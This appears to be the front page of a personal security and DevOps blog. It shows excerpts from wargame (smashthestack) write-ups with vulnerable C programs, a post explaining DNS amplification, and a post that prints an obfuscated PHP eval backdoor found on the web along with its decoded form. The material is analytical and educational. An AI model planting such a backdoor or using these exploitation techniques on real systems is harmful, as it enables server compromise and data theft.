USG Ubiquiti VPN using Strongswan

USG VPN using Strongswan Been trying to find a guide on how to setup IPsec/L2TP between USG and Linux but haven’t really found one that worked for me so this is how I have made it work. The USG There are tons of guides and videos on how to set it up on the USG so I’ll just provide a few notes on that. Created a network Turned on the server and added a preshared key Added a user Linux On my laptop running Linux (Arch) I installed strongswan and xl2tpd) (currently strongswan version 5.

Setting variables in a package on build time

Setting variables in a package on build time When building a go binary its possible to add ldflags in order to variables in build time (Like version numbers) and this is pretty well documented. But setting variables in internal/vendoring directories it not well documented. This is how its done test # tree . ├── cmd │ └── cli │ └── main.go ├── internal │ └── cmd │ └── version.go test/cmd/cli/main.

USG Ubiquiti IPv6 via DHCP

USG with IPv6 I recently bought a Ubiquiti USG which was quite easy to setup. The only problem I had was that it didn’t give out any IPv6 addresses to my clients (But router advertisement did work). My ISP gives a /48 as IPv6 delegated prefix but the USG wound’t just use that and the GUI in version 5.6.29 does not support IPv6 yet. Several documents states that you just need to enable it by adding this config.

IO Smash the stack level 10

Level10 I had a lot of issues with this level. At first I did not understand how I could exploit it so I tried several things until I finally got it. I started looking at the source code but still could not see the problem. I connected to the irc channel for help and got a few pointers on how to debug this. But the thing that helped me most I guess was this link.

IO Smash the stack level 09

Level09 level9@io:/levels$ ls -latr level09* -r-------- 1 level9 level9 182 Jan 9 2010 level09.c -r-sr-x--- 1 level10 level9 6294 Jan 9 2010 level09 level9@io:/levels$ cat level09.c #include <stdio.h> #include <string.h> int main(int argc, char **argv) { int pad = 0xbabe; char buf[1024]; strncpy(buf, argv[1], sizeof(buf) - 1); printf(buf); return 0; } A nice string format bug. Alright this should be a walk in the park using short writes when overwriting the .

IO Smash the stack level 08

Level08 level8@io:/levels$ ls -latr level08* -r-sr-x--- 1 level9 level8 14343 Sep 17 2010 level08_alt -r-------- 1 level8 level8 1927 Jan 3 2012 level08_alt.cpp -r-sr-x--- 1 level9 level8 6662 Jan 26 2012 level08 -r-------- 1 level8 level8 666 May 27 2014 level08.cpp // writen by bla for io.smashthestack.org #include <iostream> #include <cstring> #include <unistd.h> class Number { public: Number(int x) : number(x) {} void setAnnotation(char *a) {memcpy(annotation, a, strlen(a));} virtual int operator+(Number &r) {return number + r.

IO Smash the stack level 07

Level07 level7@io:/levels$ cat level07.c //written by bla #include <stdio.h> #include <string.h> #include <unistd.h> int main(int argc, char **argv) { int count = atoi(argv[1]); int buf[10]; if(count >= 10 ) return 1; memcpy(buf, argv[2], count * sizeof(int)); if(count == 0x574f4c46) { printf("WIN!\n"); execl("/bin/sh", "sh" ,NULL); } else printf("Not today son\n"); return 0; } Oki so count has to be 10 or less to invoke the memcpy but in order to get a shell count has to be 0x574f4c46 (1464814662).

IO Smash the stack level 06

Level06 level6@io:/levels$ ls -la level06* -r-sr-x--- 1 level7 level6 5849 Dec 18 2013 level06 -r-sr-x--- 1 level7 level6 7293 Aug 11 2010 level06_alt -r-------- 1 level6 level6 487 Nov 14 2011 level06_alt.c -r-------- 1 level7 level7 22 Sep 14 03:31 level06_alt.pass -r-------- 1 level6 level6 1034 May 7 2015 level06.c level6@io:/levels$ cat level06.c //written by bla //inspired by nnp #include <stdio.h> #include <stdlib.h> #include <string.h> enum{ LANG_ENGLISH, LANG_FRANCAIS, LANG_DEUTSCH, }; int language = LANG_ENGLISH; struct UserRecord{ char name[40]; char password[32]; int id; }; void greetuser(struct UserRecord user){ char greeting[64]; switch(language){ case LANG_ENGLISH: strcpy(greeting, "Hi "); break; case LANG_FRANCAIS: strcpy(greeting, "Bienvenue "); break; case LANG_DEUTSCH: strcpy(greeting, "Willkommen "); break; } strcat(greeting, user.

IO Smash the stack level 05

Level05 level5@io:/levels$ ls -latr level05* -r-------- 1 level5 level5 178 Oct 4 2007 level05.c -r-sr-x--- 1 level6 level5 7140 Nov 16 2007 level05 -r-sr-x--- 1 level6 level5 8752 Feb 22 2010 level05_alt -r-------- 1 level5 level5 2954 Feb 24 2010 level05_alt.c level5@io:/levels$ cat level05.c #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buf[128]; if(argc < 2) return 1; strcpy(buf, argv[1]); printf("%s\n", buf); return 0; } Ahh a classic bufferoverflow :)

IO Smash the stack level 04

Level04 level4@io:/levels$ ls -latr level04* -r-sr-x--- 1 level5 level4 5159 Dec 18 2013 level04 -r-------- 1 level4 level4 245 Dec 18 2013 level04.c -r-sr-x--- 1 level5 level4 5105 Sep 24 2014 level04_alt -r-------- 1 level4 level4 120 Jan 27 2015 level04_alt.c level4@io:/levels$ cat level04.c //writen by bla #include <stdlib.h> #include <stdio.h> int main() { char username[1024]; FILE* f = popen("whoami","r"); fgets(username, sizeof(username), f); printf("Welcome %s", username); return 0; } So it runs whoami without full path .

IO Smash the stack level 03

Level03 level3@io:~$ cd /levels/ level3@io:/levels$ ls -latr level03* -r-------- 1 level3 level3 658 Sep 22 2012 level03.c -r-sr-x--- 1 level4 level3 5238 Sep 22 2012 level03 level3@io:/levels$ cat level03.c //bla, based on work by beach #include <stdio.h> #include <string.h> void good() { puts("Win."); execl("/bin/sh", "sh", NULL); } void bad() { printf("I'm so sorry, you're at %p and you want to be at %p\n", bad, good); } int main(int argc, char **argv, char **envp) { void (*functionpointer)(void) = bad; char buffer[50]; if(argc !

IO Smash the stack level 02

Level02 level2@io:~$ cd /levels/ level2@io:/levels$ ls -latr level02* -r-------- 1 level2 level2 437 May 26 2011 level02_alt.c -r-sr-x--- 1 level3 level2 6940 May 26 2011 level02_alt -r-sr-x--- 1 level3 level2 5329 Oct 4 2011 level02 -r-------- 1 level2 level2 495 Apr 13 2015 level02.c This time we got source code so lets look at it level2@io:/levels$ cat level02.c //a little fun brought to you by bla #include <stdio.h> #include <stdlib.

IO Smash the stack level 01

A colleague of mine recommended playing wargames so I started on io.smashthestack.org and will write my findings. Please notice that I do not write the passwords for levels and you should really not just try to copy but understand the challanges yourself. You will only be cheating yourself of fun :) Level01 level1@io:~$ cd /levels/ level1@io:/levels$ ls -latr level01* -r-sr-x--- 1 level2 level1 1184 Jan 13 2014 level01 No source provided so lets try to start it

Creating facters on Windows

I’ve done automation with puppet for nearly 3 years on Linux but recently I have been tasked (work) with some automation on Windows. To tell you the truth I’m not exactly a fan of windows and never will be but I like a challenge. But for this particular tasks I needed a list of logical drives and a list of network adaptors and I couldn’t find anyone who had already created these facters.

PHP callback function backdoor

I recently had an incident at a customers website where the site was compromised. The customer went through the code and found several SQL injections, XSS and newly added files with backdoors (basic evals in PHP). All vulnerabilities was fixed (According to the customer) but about a month later the site was compromised again. Unfortunately no version control was used so we had to go through all files to help the customer and the log had no indications of successful attempts.

Missing unread mail count in the dock on Mac OS X 10.9 (Mavericks)

I’ve had plenty of issues with mail in Mac OS X but most of them have been related to the poor implementation of the integration with Exchange. But I have finally found a solution for one specific problem. That is the missing unread count in the dock. This is how I fixed it. Quit mail entirely and run from a command prompt # mv ~/Library/Mail/V2/MailData/Envelope* ~/Desktop/ Not open mail once again and it will do a import of all mails (Took about 2 hours on my machine but it depends on how many mails and mail accounts you have).

The lost art of debugging for admins #part 2 – Basic knowledge of protocols

Protocols Just a little knowledge about a few protocols can get you a long way when debugging. Often, clients does not give the full feedback from the server or tries to give a user-friendly error message which just makes it worse. Here is how just a handfuld of protocols can be used using telnet/openssl HTTP/HTTPS $ telnet www.example.com 80 Connected to www.example.com. Escape character is '^]'. GET / HTTP/1.1 HOST: www.

The lost art of debugging for admins #part 1 - Basics and ptrace

Basics Its been a while since my last update. Been quite busy but also because I didn’t have anything to add. But lately I’ve have a urge to write a series on how to debug on Linux (Works on other platforms as well). Mostly because it seems that the younger generation (And even older) no longer debugs their problems but just seek the nearest forum so see if anyone else had the same issue.

DNS amplification by example

How it works DNS amplification is very easy to make and quite effective. An attacker finds a DNS resolver that is public, creates a spoofed UDP DNS request originating from the targets address sending the DNS response to the target. The trick in this attack is to create a bigger output then input (hence the amplification). What better way than to request a list of authority records for a top level like .

Scanning for recursive DNS servers

When working for an ISP it becomes pretty clear that you don’t want your customers or your network to participate in any attack. I wrote a small perl script to find DNS servers open for recursive requests scandns.pl I found 19 misconfigured DNS servers. Now the real work starts by contacting the owners.

Lancope stealthwatch

Had a nice meeting yesterday with Cisco and some guys from Lanecope. Must say that stealthwatch seems like a really great product. What their product does is that is collects all flows (and more). Sums it up so you can drill down via connections. Basically it does something like this on your netflow data ~$ nfdump -R /var/cache/nfdump/data/asr0/nfcapd.201302281130:asr1/nfcapd.201302281133 -o long 'dst host'|head -10 Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Flags Tos Packets Bytes Flows 2013-02-28 11:29:58.

PHP backdoor

Found this little thing on FB tonight. <?php eval(gzinflate(base64_decode("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"))); ?> After unrolling the endless loops it turns out to be <? @error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { print(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;?> a backdoor


My name is Kim Nielsen and I work as a DevOps engineer using docker, kubernetes and Go. As you might notice I also have a strong interest in security. Started quite early programming demos (https://www.scene.org/). Never had the strong urge to play games but building the graphics around a game was fun. This started with Basic, Pascal and then moved to C and x86 assembly language. Contact: me@ this website


Miscellaneous Ivan Jørgensen Bjarke Sørensen